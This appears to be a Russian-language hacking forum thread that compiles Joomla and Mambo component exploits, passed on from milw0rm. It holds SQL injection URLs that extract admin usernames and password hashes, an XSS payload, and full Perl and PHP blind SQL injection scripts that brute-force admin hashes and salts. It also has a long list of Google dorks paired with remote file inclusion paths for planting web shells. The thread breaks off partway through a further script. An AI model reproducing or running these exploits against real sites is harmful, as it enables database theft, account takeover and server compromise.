Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability Сайт разработчика : www.elearningforce.biz Сплоит : http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[код] (с) NoGe
Joomla Пасивная XSS компонент Traxartist Уязвимость: index.php?option=com_traxartist&task=playSongex&id=1">[xss] Пример: Code: http://www.xclusivetrax.com/index.php?option=com_traxartist&task=playSongex&id=1"><script>alert(document.coockie)</script> found by it's my
Joomla Component FlippingBook 1.0.4 SQL Injection DORK: inurl:com_flippingbook Exploit: Code: /index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/* (c)cO2 milw0rm.com Joomla Component Filiale v. 1.0.4 SQL Injection DORK: inurl:com_filiale Exploit: Code: /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users (c)Str0xo milw0rm.com Joomla Component Profiler <= 1.0.1 Blind SQL Injection DORK: allinurl:com_comprofiler Exploit: Code: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/* (c)$hur!k'n milw0rm.com
Joomla Component PaxxGallery Blind SQL Injection Exploit "more than 1 row" Vuln code: PHP: ..... global $database; $id = $_POST["id"]; $gid = $_POST["gid"]; if (isset($id)) { ..... Exploit: Code: #!/usr/bin/perl use strict; use LWP::Simple; print "-+--[ Joomla Component PaxxGallery Blind SQL Injection Exploit ]--+-\n"; print "-+-- \"more than 1 row\" --+-\n"; print "-+-- --+-\n"; print "-+-- Author: ZAMUT --+-\n"; print "-+-- Vuln: gid= --+-\n"; print "-+-- Dork: option=com_paxxgallery --+-\n"; # Example: # Url_Part_1: http://www.morganomega.com/index.php?option=com_paxxgallery&Itemid=46&task=view&gid=7 # Url_Part_2: &iid=34 print "Url_Part_1:" ; chomp(my $ur1=<STDIN>); print "Url_Part_2:"; chomp(my $ur2=<STDIN>); my $n=48; my $i=1; my $log= 1; my ($content,$result) = undef; my $request = 0; while($log) { $content = get($ur1.'+and+1=(select+1+from+jos_users+where+length(if(ascii(upper(substring((select+password+from+jos_users+where+id=62),'.$i.',1)))='.$n.',password,id))>4)/*'.$ur2); if($content =~ /Subquery returns more than 1 row/) {$result.=chr($n); $n=47; $i++;} elsif($i==33 || $content =~ /doesn\'t exist/) {$log = 0} else {$n++; if($n==58){$n=65} } $request++; } print "Administrator hash: ".$result."\n"; print "REQUEST: ".$request; Dork: option=com_paxxgallery ZAMUT (c)
Joomla Component Webhosting (catid) Blind SQL Injection Exploit Exploit: Code: #!/usr/bin/perl #eSploit Framework - Inphex use Digest::MD5 qw(md5 md5_hex md5_base64); use LWP::UserAgent; use HTTP::Cookies; use Switch; $host_ = shift; $path_ = shift; $id_ = shift; $non_find = shift; #choose anything thats inside the article of id $column = "username"; #change if needet $table = "jos_users"; #change if needet $info{'info'} = { "author" => ["cO2,Inphex"], "name" => ["Joomla com_webhosting Blind SQL Injection"], "version" => [], "description" => ["This script will exploit a Blind SQL Injection Vulnerability in Joomla com_webhosting"], "options" => { "agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 2, "cookie" => { "cookie" => ["key=value"], }, }, "sending_options" => { "host" => $host_, "path" => $path_".index.php", "port" => 80, "method_a" => "SQL_INJECTION_BLIND", "attack" => { "option" => ["get","option","com_webhosting"], "catid" => ["get","catid","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"], "regex" => [[$non_find]], }, }, }; &start($info{'info'},222); open FH,">>ok.html"; print FH $return{222}{'content'}; sub start { $a_ = shift; $id = shift; $get_dA = get_d_p_s("get"); $post_dA = get_d_p_s("post"); my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0); my $jj = 1; my $ii = 48; my $hh = 1; my $ppp = 0; my $s = shift; my $a = ""; my $res_p = ""; my $h = ""; ($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'}); $ua = LWP::UserAgent->new; $ua->timeout($a_->{'options'}{'timeout'}); if ($a_->{'options'}{'proxy'}) { $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); } $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; $ua->agent($agent); { while (($k,$v) = each(%{$a_})) { if ($k ne "options" && $k ne "sending_options") { foreach $r (@{$a_->{$k}}) { if ($a_->{$k}[0]) { print $k.":".$a_->{$k}[0]."\n"; } } } } foreach $j (@{$a_->{'options'}{'default_headers'}}) { $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]); $m++; } if ($a_->{'options'}{'cookie'}{'cookie'}[0]) { $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]); } } switch ($method_m) { case "attack" { &attack();} case "SQL_INJECTION_BLIND" { &sql_injection_blind();} case "REMOTE_COMMAND_EXECUTION" { &attack();} case "REMOTE_CODE_EXECUTION" {&attack();} case "REMOTE_FILE_INCLUSION" { &attack();} case "LOCAL_FILE_INCLUSION" { &attack(); } else { &attack(); } } sub attack { if ($post_dA eq "") { $method = "get"; } elsif ($post_dA ne "") { $method = "post"; } if ($method eq "get") { $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA); ${$a_}{$id}{'content'} = $res_p; foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) { if (${$jj} ne "") { ${$a_}{$id}{'regex'}[$h] = ${$jj}; } $jj++; } $h++; } } elsif ($method eq "post") { $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA); ${$a_}{$id}{'content'} = $res_p; foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) { if (${$jj} ne "") { ${$a_}{$id}{'regex'}[$h] = ${$jj}; } $jj++; } $h++; } } } sub sql_injection_blind { syswrite STDOUT,$column.":"; while () { while ($ii <= 90) { if(check($ii,$hh) == 1) { syswrite STDOUT,lc(chr($ii)); $hh++; $chr = $chr.chr($ii); } $ii++; } push(@ffs,length($chr)); if (($#ffs -1) == $ffs) { print "\nFinished/Error\n"; exit; } $ii = 48; } } sub check($$) { $ii = shift; $hh = shift; if (get_d_p_s("post") ne "") { $method = "post"; } else { $method = "get";} if ($method eq "get") { $ppp++; $query = modify($get_dA,$ii,$hh); $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query); foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) { return 1; } else { return 0; } $h++; } } elsif ($method eq "post") { $ppp++; $query_g = modify($get_dA,$ii,$hh); $query_p = modify($post_dA,$ii,$hh); $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p); foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) { if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) { return 1; } else { return 0; } $h++; } } } sub modify($$$) { $string = shift; $replace_by = shift; $replace_by1 = shift; if ($string !~/\$i/ && $string !~/\$h/) { print $string; } elsif ($string !~/\$i/) { $ff = substr($string,0,index($string,"\$h")); $ee = substr($string,rindex($string,"\$h")+2); $string = $ff.$replace_by1.$ee; return $string; } elsif ($string !~/\$h/) { $f = substr($string,0,index($string,"\$i")); $e = substr($string,rindex($string,"\$i")+2); $string = $f.$replace_by.$e; return $string; } else { $f = substr($string,0,index($string,"\$i")); $e = substr($string,rindex($string,"\$i")+2); $string = $f.$replace_by.$e; $ff = substr($string,0,index($string,"\$h")); $ee = substr($string,rindex($string,"\$h")+2); $string = $ff.$replace_by1.$ee; return $string; } } sub get_d_p_s { $g_d_p_s = shift; $post_data = ""; $get_data = ""; $header_data = ""; %header_dA = (); while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) { if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get") { $method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]); } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post") { $method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]); } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header") { $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2]; } $hp++; } $yy = $#get; while ($bb <= $#get) { $get_data .= $get[$yy]."&"; $bb++; $yy--; } $l = $#post; while ($k <= $#post) { $post_data .= $post[$l]."&"; $k++; $l--; } if ($g_d_p_s eq "get") { return $get_data; } elsif ($g_d_p_s eq "post") { return $post_data; } elsif ($g_d_p_s eq "header") { return %header_dA; } } sub get_data { $h_host_h_xdsjaop = shift; $h_path_h_xdsjaop = shift; %hash = get_d_p_s("header"); while (($u,$c) = each(%hash)) { $ua->default_headers->push_header($u => $c); } $req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop); return $req->content; } sub post_data { $h_host_h_xdsjaop = shift; $h_path_h_xdsjaop = shift; $content_type = shift; $send = shift; %hash = get_d_p_s("header"); while (($u,$c) = each(%hash)) { $ua->default_headers->push_header($u => $c); } $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop); $req->content_type($content_type); $req->content($send); $res = $ua->request($req); return $res->content; } } # milw0rm.com [2008-05-01] milw0rm
Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit Code: <? //Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+ //Greets: all members of antichat.ru & cih.ms //options set_time_limit(0); ignore_user_abort(1); $norm_ua='Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'; $url=$_GET['url']; $where=(!empty($_GET['user']))?"where username='".$_GET['user']."'":'limit 0,1'; $id=(!empty($_GET['id']))?$_GET['id']:'1'; //functions function send_xpl($url, $xpl){ global $id; $u=parse_url($url); $req ="GET ".$u['path']."components/com_datsogallery/sub_votepic.php?id=$id&user_rating=1 HTTP/1.1\r\n"; $req.="Host: ".$u['host']."\r\n"; $req.="User-Agent: ".$xpl."\r\n"; $req.="Connection: Close\r\n\r\n"; $fs=fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n"); fwrite($fs, $req); $res=fread($fs, 4096); fclose($fs); return $res; } function xpl($condition, $pos){ global $norm_ua; global $where; $xpl=rand(1,100000)."'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*"; return $xpl; } //main echo '<title>Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+</title>'; if(empty($url)) die($_SERVER['SCRIPT_NAME']."?url=[url]&user=[username]&id=[pic_id]\n<br>username&pic_id - optional\n"); send_xpl($url, $norm_ua); //get md5 for($i=0;$i<=32;$i++){ $buff=send_xpl($url,xpl('>58', $i)); if(preg_match('/Duplicate entry/', $buff)){ for($j=97;$j<=102;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ for($j=48;$j<=57;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } else { die("exploit failed"); } } //check Joomla version $test=rand(1,100000)."'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*"; $buff=send_xpl($url,$test); if(preg_match('/Duplicate entry/', $buff)) die($pass); //separator $pass.=':'; //get salt for($i=33;$i<=49;$i++){ $buff=send_xpl($url,xpl('>58', $i)); if(preg_match('/Duplicate entry/', $buff)){ $buff=send_xpl($url, xpl('>91',$i)); if(preg_match('/Duplicate entry/', $buff)){ for($j=97;$j<=122;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ for($j=65;$j<=90;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } else { die("exploit failed"); } } elseif(preg_match('/Subquery returns more than 1 row/', $buff)){ for($j=48;$j<=57;$j++){ if(preg_match('/Duplicate entry/', send_xpl($url, xpl('='.$j,$i)))){ $pass.=chr($j); break; } } } else { die("exploit failed"); } } echo $pass; Author : +toxa+
Joomla Component xsstream-dm 0.01 Beta SQL Injection Code: #!/usr/bin/perl -w ######################################################### # Joomla Component xsstream-dm 0.01 Beta Remote SQL Injection # # download : http://sstreamtv.com/index.php?option=com_docman&task=doc_details&gid=24 ######################################################### ######################################## #[*] Founded by : Houssamix From H-T Team #[*] H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo #[*] Dork inurl:"index.php?option=com_xsstream-dm" #[*] Greetz : CoNaN & HaCkeR_EgY & All friends & All muslims HaCkeRs :) ######################################## #[*] Script_Name: "Joomla" #[*] Component_Name: "xsstream-dm" 0.01 Beta ######################################## print "\t\t########################################################\n\n"; print "\t\t# Viva Islam #\n\n"; print "\t\t########################################################\n\n"; print "\t\t# Joomla Component (xsstream-dm) Remote SQL Injection #\n\n"; print "\t\t# by Houssamix & Stack-Terrorist #\n\n"; print "\t\t# from H-T Team & v4 Team #\n\n"; print "\t\t########################################################\n\n"; use LWP::UserAgent; die "Example: perl $0 http://victim.com/\n" unless @ARGV; #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $tab="jos_users"; #the the union of joomla $un="/**/union/**/select/**/"; #the vulnerable compenent $com="com_xsstream-dm&Itemid"; # Lets star exploiting $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$user.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<div class="contentpagetitle">(.*?)<\/div>/){ print "\n[+] Admin User : $1"; } $host2 = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$pass.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**"; $res2 = $b->request(HTTP::Request->new(GET=>$host2)); $answer = $res2->content; if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n"; print "\t\t# Exploit has ben aported user and password hash #\n\n"; } else{print "\n[-] Exploit Failed...\n";} # exploit discovered by Houssamix From H-T Team # exploit exploited by Stack-Terrorist (c) by Houssamix & Stack-Terrorist
Joomla Component com_galeria Remote SQL Injection Vulnerability Code: ############################################################### # # joomla SQL Injection(com_galeria) # ############################################################### # # AUTHOR : S@BUN # # HOME : http://www.milw0rm.com/author/1334 # # MAİL : [email protected] # ################################################################ # # DORK 1 : allinurl: "com_galeria" # # DORK 2 : allinurl: id "com_galeria" # ################################################################ EXPLOIT : index.php?option=com_galeria&Itemid=S@BUN&func=detail&id=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,username/**/from/**/users/* ################################################################ # S@BUN i AM NOT HACKER S@BUN ################################################################
Раскрытие префикса таблиц в компоненте datsogallery есои при обращении к старнице позвращается цифра, то при повторном обращении к странице, она выплюнет ошибку работает не на всех версиях пример _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
Эм... Как бы ты этом и основан мой эксплойт=\ Только префикс у меня не играет роли, ибо #__ заменяется на текущий префикс при обработке его соответствующей функцией в джумле
Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability Code: ############################################################### # # joomla com_garyscookbook SQL Injection(id) # ############################################################### # # AUTHOR : S@BUN # # HOME : http://www.milw0rm.com/author/1334 # # MAİL : [email protected] # ################################################################ # # there are alot site but exploit not working for all ı found alot # # DORK 1 : allinurl:"com_garyscookbook" # # DORK 2 : allinurl: com_garyscookbook "detail" # ################################################################ EXPLOIT : index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/* ################################################################ # S@BUN i AM NOT HACKER S@BUN ################################################################ <name>garyscookbook</name> <creationDate>4-9-2005</creationDate> <author>Gerald Berger</author> <copyright>This component is released under the GNU/GPL License</copyright> <authorEmail>[email protected]</authorEmail> <authorUrl>www.vb-dozent.net</authorUrl> <version>1.1.1</version> <description>Garys Cookbook is a fully integrated Mambo Cookbook component.</description>
нашел у себя на компе, хз может баян Code: inurl:"com_flyspray" Site Sonuna: /components/com_flyspray/startdown.php?file=shell Google Dork: inurl:"com_admin" Site Sonuna: administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_simpleboard Site Sonuna: /components/com_simpleboard/file_upload.php?sbp=shell Google Dork: inurl:"com_hashcash" Site Sonuna: /components/com_hashcash/server.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_htmlarea3_xtd-c" Code: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_sitemap" Code: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_performs" Site Sonuna: components/com_performs/performs.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_forum" Site Sonuna: /components/com_forum/download.php?phpbb_root_path= Google Dork: inurl:"com_pccookbook" Site Sonuna: components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_extcalendar Site Sonuna: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell Google Dork: inurl:"minibb" Site Sonuna: components/minibb/index.php?absolute_path=shell Google Dork: inurl:"com_smf" Site Sonuna: /components/com_smf/smf.php?mosConfig_absolute_path= Site Sonuna2: /modules/mod_calendar.php?absolute_path=shell Google Dork: inurl:"com_pollxt" Site Sonuna: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_loudmounth" Site Sonuna: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_videodb" Site Sonuna: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_pcchess Site Sonuna: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_multibanners" Site Sonuna: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_a6mambohelpdesk" Site Sonuna: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell Google Dork: inurl:"com_colophon" Site Sonuna: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_mgm" Site Sonuna: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_mambatstaff" Site Sonuna: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_securityimages" Site Sonuna: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell Site Sonuna2: /components/com_securityimages/lang.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_artlinks" Site Sonuna: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_galleria" Site Sonuna: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_akocomment" Site Sonuna: /akocomments.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_cropimage" Site Sonuna: administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell Google Dork: inurl:"com_kochsuite" Site Sonuna: /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_comprofiler" Site Sonuna: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_zoom" Site Sonuna: /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell Site Sonuna2: /components/com_zoom/includes/database.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_serverstat" Site Sonuna: /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_fm" Site Sonuna: components/com_fm/fm.install.php?lm_absolute_path=shell Google Dork: inurl:com_mambelfish Site Sonuna: administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell Google Dork: inurl:com_lmo Site Sonuna: components/com_lmo/lmo.php?mosConfig_absolute_path=shell Google Dork: inurl:com_linkdirectory Site Sonuna: administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell Google Dork: inurl:com_mtree Site Sonuna: components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=shell Google Dork: inurl:com_jim Site Sonuna: administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell Google Dork: inurl:com_webring Site Sonuna: administrator/components/com_webring/admin.webring.docs.php?component_dir=shell Google Dork: inurl:com_remository Site Sonuna: administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= Google Dork: inurl:com_babackup Site Sonuna: administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell Google Dork: inurl:com_lurm_constructor Site Sonuna: administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell Google Dork: inurl:com_mambowiki Site Sonuna: components/com_mambowiki/ MamboLogin.php?IP=shell Google Dork: inurl:com_a6mambocredits Site Sonuna: administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell Google Dork: inurl:com_phpshop Site Sonuna: administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=shell Google Dork: inurl:com_cpg Site Sonuna: components/com_cpg/cpg.php?mosConfig_absolute_path=shell Google Dork: inurl:com_moodle Site Sonuna: components/com_moodle/moodle.php?mosConfig_absolute_path=shell Google Dork: inurl:com_extended_registration Site Sonuna: components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=shell Code: Google Dork: inurl:com_mospray Site Sonuna: components/com_mospray/scripts/admin.php?basedir=shell Google Dork: inurl:com_bayesiannaivefilter Site Sonuna: /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell Google Dork: inurl:com_uhp Site Sonuna: /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell Google Dork: inurl:com_peoplebook Site Sonuna: /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell Google Dork: inurl:com_mmp Site Sonuna: /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell Google Dork: inurl:com_reporter Site Sonuna: /components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell Google Dork: inurl:com_madeira Site Sonuna: /components/com_madeira/img.php?url=shell Google Dork: inurl:com_jd-wiki Site Sonuna: /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell Google Dork: inurl:com_bsq_sitestats Site Sonuna: /components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell Site Sonuna2: /com_bsq_sitestats/external/rssfeed.php?baseDir=shell Dork: com_comprofiler Expl: administrator/components/com_comprofiler/plugin.class. php?mosConfig_absolute_path=[Shell] Dork: inurl:com_multibanners Expl: /administrator/components/com_multibanners/extadminmenus.class. php?mosConfig_absolute_path=[Shell] Dork: inurl:com_colophon expl: administrator/components/com_colophon/admin.colophon. php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=[Shell]com_simpleboard Expl: /components/com_simpleboard/file_upload.php?sbp=[Shell] Dork: inurl:"com_hashcash" Expl: /components/com_hashcash/server.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_htmlarea3_xtd-c" Expl: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc. php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_sitemap" Expl: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell] -- Dork: inurl:"com_forum" Expl: /components/com_forum/download.php?phpbb_root_path=[Shell] -- Dork: inurl:"com_pccookbook" Expl: /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=[Shell]com_extcalendar Expl: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell] Dork: inurl:"minibb" Expl: /components/minibb/index.php?absolute_path=[Shell] - Dork: inurl:"com_smf" Expl: /components/com_smf/smf.php?mosConfig_absolute_path=[Shell] Expl: /modules/mod_calendar.php?absolute_path=[Shell] Dork: inurl:"com_pollxt" Expl: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_loudmounth" Expl: /components/com_loudmounth/includes/abbc/abbc.class. php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_videodb" Expl: /components/com_videodb/core/videodb.class.xml. php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=[Shell]com_pcchess Expl: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_multibanners" Expl: /administrator/components/com_multibanners/extadminmenus.class. php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_a6mambohelpdesk" Expl: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk. php?mosConfig_live_site=[Shell] Dork: inurl:"com_colophon" Expl: /administrator/components/com_colophon/admin.colophon. php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_mgm" Expl: /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_mambatstaff" Expl: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_securityimages" Expl: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell] Expl: /components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell] Dork: inurl:"com_artlinks" Expl: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell] - Dork: inurl:"com_galleria" Expl: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]
Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit Code: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " #############################################################\n"; print " # Joomla Component mycontent Blind SQL Injection Exploit #\n"; print " # Author:His0k4 [ALGERIAN HaCkeR] #\n"; print " # #\n"; print " # Conctact: His0k4.hlm[at]gamil.com #\n"; print " # Greetz: All friends & muslims HacKeRs #\n"; print " # Greetz2: http://www.palcastle.org/cc :) #\n"; print " # #\n"; print " # Usage: perl mycontent.pl host path <options> #\n"; print " # Example: perl mycontent.pl www.host.com /joomla/ -r 10 #\n"; print " # #\n"; print " # Options: #\n"; print " # -r Valid id #\n"; print " # Note: #\n"; print " # If the exploit failed #\n"; print " # Change 'regexp' value to the title of the page #\n"; print " #############################################################\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $rid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "p=s", "r=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"r"}) { $rid = $options{"r"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $rid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $rid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $rid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")"; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "E-mail"; if($content =~ /$regexp/) { return 1; } else { return 0; } } # milw0rm.com [2008-06-01] Joomla Component JooBB 0.5.9 Blind SQL Injection Exploit Code: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " #############################################################\n"; print " # Joomla Component Joo!BB Blind SQL Injection Exploit #\n"; print " # Author:His0k4 [ALGERIAN 